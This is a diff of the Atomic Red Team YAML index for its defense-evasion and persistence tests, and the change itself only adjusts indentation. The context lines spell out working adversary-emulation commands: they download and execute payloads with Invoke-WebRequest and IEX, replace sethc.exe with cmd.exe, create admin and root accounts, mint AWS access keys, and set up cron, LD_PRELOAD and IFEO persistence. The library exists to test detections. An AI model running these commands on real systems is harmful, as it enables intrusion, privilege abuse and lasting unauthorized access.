+          '
         get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1
 
-'
+          '
       executor:
         command: icacls "#{path}" /grant Everyone:F /T /C /Q
         cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1220:
@@ -37032,7 +37032,7 @@ defense-evasion:
         at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe
         when test sucessfully executed, while AV turned off.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -37048,26 +37048,26 @@ defense-evasion:
       dependencies:
       - description: 'XML file must exist on disk at specified location (#{xmlfile})
 
-'
+          '
         prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}"
       - description: 'XSL file must exist on disk at specified location (#{xslfile})
 
-'
+          '
         prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{xslfile}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}"
       executor:
         command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
 
-'
+          '
         name: command_prompt
     - name: MSXSL Bypass using remote files
       auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985
@@ -37076,7 +37076,7 @@ defense-evasion:
         at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe
         when test sucessfully executed, while AV turned off.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -37091,14 +37091,14 @@ defense-evasion:
       executor:
         command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
 
-'
+          '
         name: command_prompt
     - name: WMIC bypass using local XSL file
       auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988
       description: 'Executes the code specified within a XSL script using a local
         payload.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -37114,17 +37114,17 @@ defense-evasion:
       dependencies:
       - description: 'XSL file must exist on disk at specified location (#{local_xsl_file})
 
-'
+          '
         prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}"
       executor:
         command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
 
-'
+          '
         name: command_prompt
     - name: WMIC bypass using remote XSL file
       auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b
@@ -37132,7 +37132,7 @@ defense-evasion:
         payload. Open Calculator.exe when test sucessfully executed, while AV turned
         off.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -37147,7 +37147,7 @@ defense-evasion:
       executor:
         command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}"
 
-'
+          '
         name: command_prompt
 persistence:
   T1546.008:
@@ -37241,7 +37241,7 @@ persistence:
           description: 'Comma separated list of system binaries to which you want
             to attach each #{attached_process}. Default: "osk.exe"
 
-'
+            '
           type: String
           default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
             atbroker.exe
@@ -37249,7 +37249,7 @@ persistence:
           description: 'Full path to process to attach to target in #{parent_list}.
             Default: cmd.exe
 
-'
+            '
           type: Path
           default: C:\windows\system32\cmd.exe
       executor:
@@ -37283,7 +37283,7 @@ persistence:
       auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
       description: 'Replace sticky keys binary (sethc.exe) with cmd.exe
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -37294,7 +37294,7 @@ persistence:
           copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
         cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1098:
@@ -37371,7 +37371,7 @@ persistence:
       auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af
       description: 'Manipulate Admin Account Name
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -37437,7 +37437,7 @@ persistence:
       dependencies:
       - description: 'PS Module ActiveDirectory
 
-'
+          '
         prereq_command: "Try {\n    Import-Module ActiveDirectory -ErrorAction Stop
           | Out-Null\n    exit 0\n} \nCatch {\n    exit 1\n}\n"
         get_prereq_command: |
@@ -37460,14 +37460,14 @@ persistence:
         cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))"
           | Remove-ADUser -Confirm:$False
 
-'
+          '
         name: powershell
     - name: AWS - Create a group and add a user to that group
       auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
       description: 'Adversaries create AWS group, add users to specific to that group
         to elevate their privilieges to gain more accesss
 
-'
+        '
       supported_platforms:
       - iaas:aws
       input_arguments:
@@ -37479,14 +37479,14 @@ persistence:
       - description: 'Check if the user exists, we can only add a user to a group
           if the user exists.
 
-'
+          '
         prereq_command: 'aws iam list-users | grep #{username}
 
-'
+          '
         get_prereq_command: 'echo Please run atomic test T1136.003, before running
           this atomic test
 
-'
+          '
       executor:
         command: |
           aws iam create-group --group-name #{username}
@@ -37700,7 +37700,7 @@ persistence:
         command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX
           ((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))"
 
-'
+          '
   T1098.001:
     technique:
       external_references:
@@ -37807,13 +37807,13 @@ persistence:
       dependencies:
       - description: 'AzureAD module must be installed.
 
-'
+          '
         prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Install-Module -Name AzureAD -Force
 
-'
+          '
       executor:
         command: |
           Import-Module -Name AzureAD
@@ -37884,13 +37884,13 @@ persistence:
       dependencies:
       - description: 'AzureAD module must be installed.
 
-'
+          '
         prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Install-Module -Name AzureAD -Force
 
-'
+          '
       executor:
         command: |
           Import-Module -Name AzureAD
@@ -37932,7 +37932,7 @@ persistence:
       description: 'Adversaries create their own new access and secret keys to programatically
         interact with AWS environment, which is already compromised
 
-'
+        '
       supported_platforms:
       - iaas:aws
       input_arguments:
@@ -37943,14 +37943,14 @@ persistence:
       dependencies:
       - description: 'Check if the user exists.
 
-'
+          '
         prereq_command: 'aws iam list-users | grep #{username}
 
-'
+          '
         get_prereq_command: 'echo Please run atomic test T1136.003, before running
           this atomic
 
-'
+          '
       executor:
         command: |
           aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
@@ -38145,11 +38145,11 @@ persistence:
       - description: 'Reg files must exist on disk at specified locations (#{registry_file}
           and #{registry_cleanup_file})
 
-'
+          '
         prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file}))
           {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null
@@ -38158,11 +38158,11 @@ persistence:
       - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and
           T1546.010x86.dll)
 
-'
+          '
         prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll))
           {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll
@@ -38170,10 +38170,10 @@ persistence:
       executor:
         command: 'reg.exe import #{registry_file}
 
-'
+          '
         cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1546.011:
@@ -38281,31 +38281,31 @@ persistence:
       - description: 'Shim database file must exist on disk at specified location
           (#{file_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}"
       - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll
 
-'
+          '
         prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit
           1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll
       executor:
         command: 'sdbinst.exe #{file_path}
 
-'
+          '
         cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: New shim database files created in the default shim database directory
@@ -38398,7 +38398,7 @@ persistence:
       description: 'This test submits a command to be run in the future by the `at`
         daemon.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -38414,30 +38414,30 @@ persistence:
       dependencies:
       - description: 'The `at` and `atd` executables must exist in the PATH
 
-'
+          '
         prereq_command: 'which at && which atd
 
-'
+          '
         get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found
           in the PATH (Package name: `at`)''
 
-'
+          '
       - description: 'The `atd` daemon must be running
 
-'
+          '
         prereq_command: 'systemctl status atd || service atd status
 
-'
+          '
         get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service
           atd start` ; systemd: `systemctl start atd`)''
 
-'
+          '
       executor:
         name: sh
         elevation_required: false
         command: 'echo "#{at_command}" | at #{time_spec}
 
-'
+          '
   T1053.002:
     technique:
       external_references:
@@ -38534,7 +38534,7 @@ persistence:
         elevation_required: false
         command: 'at 13:20 /interactive cmd
 
-'
+          '
   T1547.002:
     technique:
       id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec
@@ -38699,10 +38699,10 @@ persistence:
         command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file}
           #{local_file}
 
-'
+          '
         cleanup_command: 'del #{local_file} >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Bitsadmin Download (PowerShell)
       auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc
@@ -38726,10 +38726,10 @@ persistence:
         command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination
           #{local_file}
 
-'
+          '
         cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Persist, Download, & Execute
       auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae
@@ -38767,7 +38767,7 @@ persistence:
           bitsadmin.exe /complete #{bits_job_name}
         cleanup_command: 'del #{local_file} >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Bits download using desktopimgdownldr.exe (cmd)
       auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
@@ -38799,10 +38799,10 @@ persistence:
         command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file}
           /eventName:desktopimgdownldr
 
-'
+          '
         cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >null 2>&1
 
-'
+          '
         name: command_prompt
   T1547:
     technique:
@@ -39127,7 +39127,7 @@ persistence:
       auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938
       description: 'Create a file called test.wma, with the duration of 30 seconds
 
-'
+        '
       supported_platforms:
       - linux
       - windows
@@ -39147,7 +39147,7 @@ persistence:
         sent from a compromised host. This will install one (of many) available VPNS
         in the Edge add-on store.
 
-'
+        '
       supported_platforms:
       - windows
       - macos
@@ -39267,7 +39267,7 @@ persistence:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -39312,7 +39312,7 @@ persistence:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -39350,7 +39350,7 @@ persistence:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -39467,10 +39467,10 @@ persistence:
       executor:
         command: 'assoc #{extension_to_change}=#{target_extension_handler}
 
-'
+          '
         cleanup_command: 'assoc  #{extension_to_change}=#{original_extension_handler}
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1136.003:
@@ -39540,7 +39540,7 @@ persistence:
         activity do not interupt the normal functions of the compromised users and
         can remain undetected for a long time
 
-'
+        '
       supported_platforms:
       - iaas:aws
       input_arguments:
@@ -39551,21 +39551,21 @@ persistence:
       dependencies:
       - description: 'Check if ~/.aws/credentials file has a default stanza is configured
 
-'
+          '
         prereq_command: 'cat ~/.aws/credentials | grep "default"
 
-'
+          '
         get_prereq_command: 'echo Please install the aws-cli and configure your AWS
           defult profile using: aws configure
 
-'
+          '
       executor:
         command: 'aws iam create-user --user-name #{username}
 
-'
+          '
         cleanup_command: 'aws iam delete-user --user-name #{username}
 
-'
+          '
         name: sh
         elevation_required: false
   T1078.004:
@@ -39861,7 +39861,7 @@ persistence:
         CronJob for scheduling execution of malicious code that would run as a container
         in the cluster.
 
-'
+        '
       supported_platforms:
       - containers
       input_arguments:
@@ -39872,17 +39872,17 @@ persistence:
       dependencies:
       - description: 'kubectl must be installed
 
-'
+          '
         get_prereq_command: 'echo "kubectl must be installed manually"
 
-'
+          '
         prereq_command: 'which kubectl
 
-'
+          '
       executor:
         command: 'kubectl get cronjobs -n #{namespace}
 
-'
+          '
         name: bash
         elevation_required: false
     - name: CreateCronjob
@@ -39894,7 +39894,7 @@ persistence:
         CronJob for scheduling execution of malicious code that would run as a container
         in the cluster.
 
-'
+        '
       supported_platforms:
       - containers
       input_arguments:
@@ -39905,20 +39905,20 @@ persistence:
       dependencies:
       - description: 'kubectl must be installed
 
-'
+          '
         get_prereq_command: 'echo "kubectl must be installed manually"
 
-'
+          '
         prereq_command: 'which kubectl
 
-'
+          '
       executor:
         command: 'kubectl create -f src/cronjob.yaml -n #{namespace}
 
-'
+          '
         cleanup_command: 'kubectl delete cronjob art -n #{namespace}
 
-'
+          '
         name: bash
         elevation_required: false
   T1136:
@@ -40100,7 +40100,7 @@ persistence:
         of the referenced file. This technique was used by numerous IoT automated
         exploitation attacks.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -40120,7 +40120,7 @@ persistence:
           echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
         cleanup_command: 'crontab /tmp/notevil
 
-'
+          '
     - name: Cron - Add script to all cron subfolders
       auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
       description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
@@ -40128,7 +40128,7 @@ persistence:
         schedule. This technique was used by the threat actor Rocke during the exploitation
         of Linux web servers.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -40160,7 +40160,7 @@ persistence:
         to execute on a schedule. This technique was used by the threat actor Rocke
         during the exploitation of Linux web servers.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -40177,10 +40177,10 @@ persistence:
         name: bash
         command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
 
-'
+          '
         cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name}
 
-'
+          '
   T1574.001:
     technique:
       id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
@@ -40355,10 +40355,10 @@ persistence:
       dependencies:
       - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable})
 
-'
+          '
         prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}"
@@ -40366,7 +40366,7 @@ persistence:
         command: "#{gup_executable}\n"
         cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
 
-'
+          '
         name: command_prompt
   T1078.001:
     technique:
@@ -40478,16 +40478,16 @@ persistence:
       description: 'The Adversaries can activate the default Guest user. The guest
         account is inactivated by default
 
-'
+        '
       supported_platforms:
       - windows
       executor:
         command: 'net user guest /active:yes
 
-'
+          '
         cleanup_command: 'net user guest /active:no
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1136.002:
@@ -40539,7 +40539,7 @@ persistence:
       auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62
       description: 'Creates a new domain admin user in a command prompt.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -40561,14 +40561,14 @@ persistence:
           net group "#{group}" "#{username}" /add /domain
         cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain
 
-'
+          '
         name: command_prompt
         elevation_required: false
     - name: Create a new account similar to ANONYMOUS LOGON
       auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548
       description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -40583,10 +40583,10 @@ persistence:
       executor:
         command: 'net user "#{username}" "#{password}" /add /domain
 
-'
+          '
         cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain
 
-'
+          '
         name: command_prompt
         elevation_required: false
     - name: Create a new Domain Account using PowerShell
@@ -40594,7 +40594,7 @@ persistence:
       description: 'Creates a new Domain User using the credentials of the Current
         User
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -40623,7 +40623,7 @@ persistence:
           $User
         cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1"
 
-'
+          '
         name: powershell
         elevation_required: false
   T1078.002:
@@ -40986,21 +40986,21 @@ persistence:
       - description: 'The shared library must exist on disk at specified location
           (#{path_to_shared_library})
 
-'
+          '
         prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit
           1; fi;
 
-'
+          '
         get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
 
-'
+          '
       executor:
         command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload''
 
-'
+          '
         cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload
 
-'
+          '
         name: bash
         elevation_required: true
     - name: Shared Library Injection via LD_PRELOAD
@@ -41025,18 +41025,18 @@ persistence:
       - description: 'The shared library must exist on disk at specified location
           (#{path_to_shared_library})
 
-'
+          '
         prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
           1; fi;
 
-'
+          '
         get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
 
-'
+          '
       executor:
         command: 'LD_PRELOAD=#{path_to_shared_library} ls
 
-'
+          '
         name: bash
   T1546.014:
     technique:
@@ -41097,7 +41097,7 @@ persistence:
       description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor)
         daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -41386,7 +41386,7 @@ persistence:
       description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension,
         please see "T1133\src\list of vpn extension.txt" to view complete list
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -41399,12 +41399,12 @@ persistence:
           type: String
           default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"
 
-'
+            '
       dependency_executor_name: powershell
       dependencies:
       - description: 'Chrome must be installed
 
-'
+          '
         prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe")
           -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"))
           {exit 0} else {exit 1}
@@ -41624,7 +41624,7 @@ persistence:
       auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8
       description: 'Leverage Global Flags Settings
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -41640,19 +41640,19 @@ persistence:
         command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
           File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
 
-'
+          '
         cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
           NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger
           /f >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: IFEO Global Flags
       auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1
       description: 'Leverage Global Flags Settings
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -41836,7 +41836,7 @@ persistence:
       description: 'This test uses the insmod command to load a kernel module for
         Linux.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -41860,10 +41860,10 @@ persistence:
       dependencies:
       - description: 'The kernel module must exist on disk at specified location
 
-'
+          '
         prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi;
 
-'
+          '
         get_prereq_command: |
           if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
           cp #{module_source_path}/* #{temp_folder}/
@@ -41872,7 +41872,7 @@ persistence:
       executor:
         command: 'sudo insmod #{module_path}
 
-'
+          '
         cleanup_command: |
           sudo rmmod #{module_name}
           [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
@@ -42078,7 +42078,7 @@ persistence:
       auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900
       description: 'Create a plist and execute it
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -42095,15 +42095,15 @@ persistence:
       - description: 'The shared library must exist on disk at specified location
           (#{path_malicious_plist})
 
-'
+          '
         prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
           1; fi;
 
-'
+          '
         get_prereq_command: 'echo "The shared library doesn''t exist. Check the path";
           exit 1;
 
-'
+          '
       executor:
         name: bash
         elevation_required: true
@@ -42197,7 +42197,7 @@ persistence:
       auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf
       description: 'Utilize LaunchDaemon to launch `Hello World`
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -42214,15 +42214,15 @@ persistence:
       - description: 'The shared library must exist on disk at specified location
           (#{path_malicious_plist})
 
-'
+          '
         prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
           1; fi;
 
-'
+          '
         get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
           try again."; exit 1;
 
-'
+          '
       executor:
         name: bash
         elevation_required: true
@@ -42366,7 +42366,7 @@ persistence:
       auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2
       description: 'Create a user via useradd
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -42377,17 +42377,17 @@ persistence:
       executor:
         command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username}
 
-'
+          '
         cleanup_command: 'userdel #{username}
 
-'
+          '
         name: bash
         elevation_required: true
     - name: Create a user account on a MacOS system
       auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2'
       description: 'Creates a user on a MacOS system with dscl
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -42409,7 +42409,7 @@ persistence:
           dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
         cleanup_command: 'dscl . -delete /Users/#{username}
 
-'
+          '
         name: bash
         elevation_required: true
     - name: Create a new user in a command prompt
@@ -42431,10 +42431,10 @@ persistence:
       executor:
         command: 'net user /add "#{username}" "#{password}"
 
-'
+          '
         cleanup_command: 'net user /del "#{username}" >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Create a new user in PowerShell
@@ -42452,10 +42452,10 @@ persistence:
       executor:
         command: 'New-LocalUser -Name "#{username}" -NoPassword
 
-'
+          '
         cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
 
-'
+          '
         name: powershell
         elevation_required: true
     - name: Create a new user in Linux with `root` UID and GID.
@@ -42463,7 +42463,7 @@ persistence:
       description: 'Creates a new user in Linux and adds the user to the `root` group.
         This technique was used by adversaries during the Butter attack campaign.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -42481,14 +42481,14 @@ persistence:
           if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi;
         cleanup_command: 'userdel #{username}
 
-'
+          '
         name: bash
         elevation_required: true
     - name: Create a new Windows admin user
       auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559
       description: 'Creates a new admin user in a command prompt.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -42506,7 +42506,7 @@ persistence:
           net localgroup administrators "#{username}" /add
         cleanup_command: 'net user /del "#{username}" >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1078.003:
@@ -42634,7 +42634,7 @@ persistence:
       auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4
       description: 'Mac logon script
 
-'
+        '
       supported_platforms:
       - macos
       executor:
@@ -42863,7 +42863,7 @@ persistence:
       description: 'Netsh interacts with other operating system components using dynamic-link
         library (DLL) files
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -42874,7 +42874,7 @@ persistence:
       executor:
         command: 'netsh.exe add helper #{helper_file}
 
-'
+          '
         name: command_prompt
   T1556.004:
     technique:
@@ -43243,11 +43243,11 @@ persistence:
         command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf"
           /t REG_SZ /d "#{thing_to_execute}"
 
-'
+          '
         cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office
           test\Special\Perf"
 
-'
+          '
         name: command_prompt
   T1137.003:
     technique:
@@ -43382,11 +43382,11 @@ persistence:
         command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder}
           /v URL /t REG_SZ /d #{url} /f
 
-'
+          '
         cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder}
           /v URL /f
 
-'
+          '
   T1137.005:
     technique:
       external_references:
@@ -43507,7 +43507,7 @@ persistence:
       description: 'Uses PowerShell to install and register a password filter DLL.
         Requires a reboot and administrative privileges.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -43520,14 +43520,14 @@ persistence:
       - description: 'AtomicPasswordFilter.dll must exist on disk at specified location
           (#{input_dll})
 
-'
+          '
         prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Write-Host "You must provide your own password filter
           dll"
 
-'
+          '
       executor:
         command: |
           $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
@@ -43943,7 +43943,7 @@ persistence:
       auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8
       description: 'Modify MacOS plist file in one of two directories
 
-'
+        '
       supported_platforms:
       - macos
       executor:
@@ -44155,10 +44155,10 @@ persistence:
         command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART"
           /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ
 
-'
+          '
         cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART"
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1546.013:
@@ -44244,7 +44244,7 @@ persistence:
         profile pofile that points to a malicious executable. Upon execution, calc.exe
         will be launched.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -44260,13 +44260,13 @@ persistence:
       dependencies:
       - description: 'Ensure a powershell profile exists for the current user
 
-'
